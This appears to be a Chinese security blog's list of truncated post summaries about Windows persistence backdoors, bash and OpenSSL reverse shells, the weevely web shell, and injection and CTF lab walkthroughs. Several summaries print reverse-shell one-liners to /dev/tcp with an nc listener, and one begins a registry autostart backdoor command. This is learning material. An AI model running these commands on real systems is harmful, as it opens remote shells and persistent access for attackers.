摘要:
技巧总结 1.添加影子用户 2.在注册表中添加自启动后门 3.通过计划任务添加后门 4.隐藏技巧 具体操作 1.添加影子用户 可见Windows影子用户创建与3389连接 2.在注册表中添加自启动后门 win+r运行输入regedit,进入注册表编辑器 通过 reg add "HKEY_CURREN 阅读全文
摘要:
前言 Linux下,一条bash命令就可以反弹出shell。之前不求甚解的复现,突然有了一个疑问,为什么这样就能实现shell反弹?又重新学习了一下bash,这是一篇关于bash反弹原理的介绍。 反弹shell命令如下 受害者: bash -i >& /dev/tcp/ip/port 0>&1 攻击 阅读全文
摘要:
kali使用OpenSSL加密反弹shell 通过bash普通反弹shell kali开启监听 nc -lvp 3333 在受害机上反弹交互式shell bash -i &>/dev/tcp/192.168.80.131/3333 <&1 成功反弹了ubuntu的shell,打开wireshark监 阅读全文
摘要:
前言 在目前的后门生成工具中,最常用的就是MSF和CobaltStrike了。weevely人称Linux中的菜刀,相比于前两者,最主要的是操作比较简单,接下来简单介绍一下。 基本用法 [+] Run terminal or command on the target //连接后门 weevely 阅读全文
摘要:
命令执行漏洞 1、命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限。 2、命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。 3、更常见的命令执行漏洞是发生在各种Web组件,包括W 阅读全文
摘要:
phpMyAdmin后台文件包含分析溯源 前言 文件包含漏洞是什么? 简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来,直接使用包含文件的代码。 直接上题,靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFW 阅读全文
摘要:
最近就继续更新刷题吧。 靶场地址:https://www.mozhe.cn/bug/detail/VFduTDlNaXFZMmJjY1Mzdnd1THFhQT09bW96aGUmozhe 打开靶场 在这之前确实不懂XML该怎么注入,和报错注入里面的updaxml弄混了,在做题之前,先简单了解一下XM 阅读全文
摘要:
记第一次CTF心得,第一届东软杯CTF 从周四组队报名,到周五参加预练,对CTF都是处于比较懵的状态,周四的预练倒是个第三名。到今天,大意了,今天伤亡惨重。 上午只做出了两道题,当时总共大概15道左右,心态就没了,打算放弃了都。下午回来又打开来试了试,有了不错的收获。 一个个来说吧。 WEB web 阅读全文
摘要:
墨者学院-SQL注入实战-MySQL 前言 最近在研究一些其他有趣的技术,发现很久不更靶场的题目了。 今天做一个SQL注入的题,靶场地址如下:https://www.mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe 正文 阅读全文
摘要:
识别验证码的暴力破解 前言 对于暴力破解,理论上来说,只要字典足够强大,暴力破解一定可以登录成功,但现在的登陆往往还伴随着验证码,比如 所以如何识别验证码,才是最重要的 解决方法 利用BurpSuite插件captcha-killer:https://github.com/c0ny1/captcha 阅读全文